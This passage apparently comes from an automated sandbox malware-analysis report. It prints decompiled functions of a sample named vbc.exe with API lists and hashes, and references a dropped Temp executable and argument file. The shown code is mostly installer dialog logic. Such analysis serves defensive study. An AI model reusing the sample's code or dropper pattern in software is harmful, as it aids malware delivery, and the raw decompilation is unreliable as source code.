                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                                                        • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
                                                        • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                                                        • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0040580F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a84;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f88;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a6c == _t156) {
							ShowWindow( *0x7a8aa8, 8);
							if( *0x7a8b2c == _t156) {
								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
							}
							E004045A3(_t171);
							goto L25;
						}
						 *0x7a0758 = 2;
						E004045A3(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404631(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a70, _t156);
						ShowWindow(_t169, 8);
						E004045FF(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8ab0;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a84 = _t134;
				_v8 = _t134;
				E004045FF( *0x7a7a70);
				 *0x7a7a74 = E00404F58(4);
				 *0x7a7a8c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045CA(_a4);
				if(( *0x7a8ab8 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a70, _t156);
					if(( *0x7a8ab8 & 0x00000002) != 0) {
						 *0x7a7a70 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045FF( *0x7a7a68);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8ab8 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                        0x00405817
                                                        0x0040581d
                                                        0x00405827
                                                        0x0040582a
                                                        0x004059c0
                                                        0x004059e4
                                                        0x004059e4
                                                        0x004059f7
                                                        0x00405a15
                                                        0x00405a17
                                                        0x00405a1f
                                                        0x00405a75
                                                        0x00405a79
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a7b
                                                        0x00405a81
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a8b
                                                        0x00405a93
                                                        0x00405a96
                                                        0x00405b98
                                                        0x00000000
                                                        0x00405b98
                                                        0x00405aa5
                                                        0x00405ab0
                                                        0x00405ab9
                                                        0x00405ac4
                                                        0x00405ac7
                                                        0x00405ad0
                                                        0x00405ad6
                                                        0x00405ad9
                                                        0x00405ad9
                                                        0x00405af1
                                                        0x00405afa
                                                        0x00405afd
                                                        0x00405b04
                                                        0x00405b0b
                                                        0x00405b13
                                                        0x00405b13
                                                        0x00405b2a
                                                        0x00405b2a
                                                        0x00405b31
                                                        0x00405b37
                                                        0x00405b43
                                                        0x00405b4a
                                                        0x00405b53
                                                        0x00405b55
                                                        0x00405b58
                                                        0x00405b67
                                                        0x00405b6a
                                                        0x00405b70
                                                        0x00405b71
                                                        0x00405b77
                                                        0x00405b78
                                                        0x00405b79
                                                        0x00405b81
                                                        0x00405b8c
                                                        0x00405b92
                                                        0x00405b92
                                                        0x00000000
                                                        0x00405af1
                                                        0x00405a27
                                                        0x00405a57
                                                        0x00405a5f
                                                        0x00405a6a
                                                        0x00405a6a
                                                        0x00405a70
                                                        0x00000000
                                                        0x00405a70
                                                        0x00405a2b
                                                        0x00405a35
                                                        0x00000000
                                                        0x004059f9
                                                        0x004059ff
                                                        0x00405a3a
                                                        0x00000000
                                                        0x00405a43
                                                        0x00405a08
                                                        0x00405a0d
                                                        0x00405a10
                                                        0x00000000
                                                        0x00405a10
                                                        0x004059f7
                                                        0x00405830
                                                        0x00405834
                                                        0x0040583c
                                                        0x00405840
                                                        0x00405843
                                                        0x00405846
                                                        0x00405849
                                                        0x0040584c
                                                        0x0040584d
                                                        0x0040584e
                                                        0x00405867
                                                        0x0040586a
                                                        0x00405874
                                                        0x00405883
                                                        0x0040588b
                                                        0x00405893
                                                        0x00405898
                                                        0x0040589b
                                                        0x004058a7
                                                        0x004058b0
                                                        0x004058b9
                                                        0x004058db
                                                        0x004058e1
                                                        0x004058f2
                                                        0x004058f7
                                                        0x00405905
                                                        0x00405913
                                                        0x00405913
                                                        0x00405918
                                                        0x00405926
                                                        0x00405926
                                                        0x0040592b
                                                        0x0040592e
                                                        0x00405933
                                                        0x0040593f
                                                        0x00405948
                                                        0x00405955
                                                        0x00405964
                                                        0x00405957
                                                        0x0040595c
                                                        0x0040595c
                                                        0x00405970
                                                        0x00405970
                                                        0x00405984
                                                        0x0040598d
                                                        0x00405996
                                                        0x004059a6
                                                        0x004059b2
                                                        0x004059b2
                                                        0x00000000

                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 0040586D
                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040587C
                                                        • GetClientRect.USER32 ref: 004058B9
                                                        • GetSystemMetrics.USER32 ref: 004058C0
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
                                                        • ShowWindow.USER32(00000000,?), ref: 00405948
                                                        • ShowWindow.USER32(?,00000008), ref: 0040595C
                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040597D
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040588B
                                                          • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004059CF
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000057A3,00000000), ref: 004059DD
                                                        • CloseHandle.KERNEL32(00000000), ref: 004059E4
                                                        • ShowWindow.USER32(00000000), ref: 00405A08
                                                        • ShowWindow.USER32(?,00000008), ref: 00405A0D
                                                        • ShowWindow.USER32(00000008), ref: 00405A57
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
                                                        • CreatePopupMenu.USER32 ref: 00405A9C
                                                        • AppendMenuW.USER32 ref: 00405AB0
                                                        • GetWindowRect.USER32(?,?), ref: 00405AD0
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
                                                        • OpenClipboard.USER32(00000000), ref: 00405B31
                                                        • EmptyClipboard.USER32 ref: 00405B37
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
                                                        • GlobalLock.KERNEL32 ref: 00405B4D
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
                                                        • SetClipboardData.USER32 ref: 00405B8C
                                                        • CloseClipboard.USER32 ref: 00405B92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: {
                                                        • API String ID: 590372296-366298937
                                                        • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                                                        • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
                                                        • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                                                        • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404ABB Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f60;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CB2(0x3fb, _t146);
					E004068F5(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CB2(0x3fb, _t146);
							if(E00406045(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040666E(0x79ff58, _t146);
							_t87 = E00406A3B(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040666E(0x79ff58, _t146);
								_t89 = E00405FE8(0x79ff58);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff58) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F89(0x79ff58);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff58) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F58(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
									E00404F40(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff48);
									} else {
										E00404E77(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b44 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045EC(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
									E00404A14();
								}
								 *0x7a1f78 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f88;
							_v60 = E00404E11;
							_v56 = _t146;
							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F3D(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == 0x7b3800) {
									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
										lstrcatW(_t146, 0x7a6a40);
									}
								}
								 *0x7a1f78 =  *0x7a1f78 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
						E00405F3D(_t146);
					}
					 *0x7a7a78 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045CA(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045CA(_t167);
					E004045FF(_t166);
					_t138 = E00406A3B(8);
					if(_t138 == 0) {
						L53:
						return E00404631(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                        0x00404abb
                                                        0x00404ac1
                                                        0x00404ac7
                                                        0x00404ad4
                                                        0x00404ae2
                                                        0x00404ae5
                                                        0x00404aed
                                                        0x00404af3
                                                        0x00404af3
                                                        0x00404aff
                                                        0x00404b02
                                                        0x00404b70
                                                        0x00404b77
                                                        0x00404c4e
                                                        0x00404c55
                                                        0x00404c64
                                                        0x00404c64
                                                        0x00404c68
                                                        0x00404c72
                                                        0x00404c7f
                                                        0x00404c81
                                                        0x00404c81
                                                        0x00404c8f
                                                        0x00404c96
                                                        0x00404c9d
                                                        0x00404ca0
                                                        0x00404cdc
                                                        0x00404cde
                                                        0x00404ce4
                                                        0x00404ce9
                                                        0x00404ced
                                                        0x00404cef
                                                        0x00404cef
                                                        0x00404d0b
                                                        0x00000000
                                                        0x00404d0d
                                                        0x00404d10
                                                        0x00404d1e
                                                        0x00404d24
                                                        0x00404d25
                                                        0x00404d28
                                                        0x00404d2b
                                                        0x00000000
                                                        0x00404d2b
                                                        0x00404ca2
                                                        0x00404ca4
                                                        0x00404ca8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404caa
                                                        0x00404caa
                                                        0x00404cb7
                                                        0x00404cbc
                                                        0x00000000
                                                        0x00000000
                                                        0x00404cc0
                                                        0x00404cc2
                                                        0x00404cc2
                                                        0x00404ccb
                                                        0x00404ccd
                                                        0x00404cd2
                                                        0x00404cd5
                                                        0x00404cda
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404cda
                                                        0x00404d37
                                                        0x00404d41
                                                        0x00404d44
                                                        0x00404d47
                                                        0x00404d4e
                                                        0x00404d4e
                                                        0x00404d50
                                                        0x00404d50
                                                        0x00404d55
                                                        0x00404d57
                                                        0x00404d5f
                                                        0x00404d66
                                                        0x00404d68
                                                        0x00404d73
                                                        0x00404d73
                                                        0x00404d68
                                                        0x00404d83
                                                        0x00404d8d
                                                        0x00404d95
                                                        0x00404db0
                                                        0x00404d97
                                                        0x00404da0
                                                        0x00404da0
                                                        0x00404d95
                                                        0x00404db5
                                                        0x00404dba
                                                        0x00404dbf
                                                        0x00404dc8
                                                        0x00404dc8
                                                        0x00404dd1
                                                        0x00404dd3
                                                        0x00404dd3
                                                        0x00404ddf
                                                        0x00404de7
                                                        0x00404df1
                                                        0x00404df1
                                                        0x00404df6
                                                        0x00000000
                                                        0x00404df6
                                                        0x00404ca0
                                                        0x00404c57
                                                        0x00404c5e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404c5e
                                                        0x00404b7d
                                                        0x00404b86
                                                        0x00404ba0
                                                        0x00404ba5
                                                        0x00404baf
                                                        0x00404bb6
                                                        0x00404bc2
                                                        0x00404bc5
                                                        0x00404bc8
                                                        0x00404bcf
                                                        0x00404bd7
                                                        0x00404bda
                                                        0x00404bde
                                                        0x00404be5
                                                        0x00404bed
                                                        0x00404c47
                                                        0x00404bef
                                                        0x00404bf0
                                                        0x00404bf7
                                                        0x00404c01
                                                        0x00404c09
                                                        0x00404c16
                                                        0x00404c2a
                                                        0x00404c2e
                                                        0x00404c2e
                                                        0x00404c2a
                                                        0x00404c33
                                                        0x00404c40
                                                        0x00404c40
                                                        0x00404bed
                                                        0x00000000
                                                        0x00404ba5
                                                        0x00404b93
                                                        0x00000000
                                                        0x00000000
                                                        0x00404b99
                                                        0x00000000
                                                        0x00404b04
                                                        0x00404b11
                                                        0x00404b1a
                                                        0x00404b27
                                                        0x00404b27
                                                        0x00404b2e
                                                        0x00404b34
                                                        0x00404b3d
                                                        0x00404b40
                                                        0x00404b43
                                                        0x00404b4b
                                                        0x00404b4e
                                                        0x00404b51
                                                        0x00404b57
                                                        0x00404b5e
                                                        0x00404b65
                                                        0x00404dfc
                                                        0x00404e0e
                                                        0x00404b6b
                                                        0x00404b6e
                                                        0x00000000
                                                        0x00404b6e
                                                        0x00404b65

                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404B0A
                                                        • SetWindowTextW.USER32 ref: 00404B34
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,007A1F88,00000000,?,?), ref: 00404C22
                                                        • lstrcatW.KERNEL32 ref: 00404C2E
                                                        • SetDlgItemTextW.USER32 ref: 00404C40
                                                          • Part of subcall function 00405CB2: GetDlgItemTextW.USER32 ref: 00405CC5
                                                          • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406958
                                                          • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406967
                                                          • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 0040696C
                                                          • Part of subcall function 004068F5: CharPrevW.USER32(?,?), ref: 0040697F
                                                        • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
                                                        • MulDiv.KERNEL32 ref: 00404D1E
                                                          • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                                                          • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                                                          • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                        • API String ID: 2624150263-3265188449
                                                        • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                                                        • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
                                                        • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                                                        • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
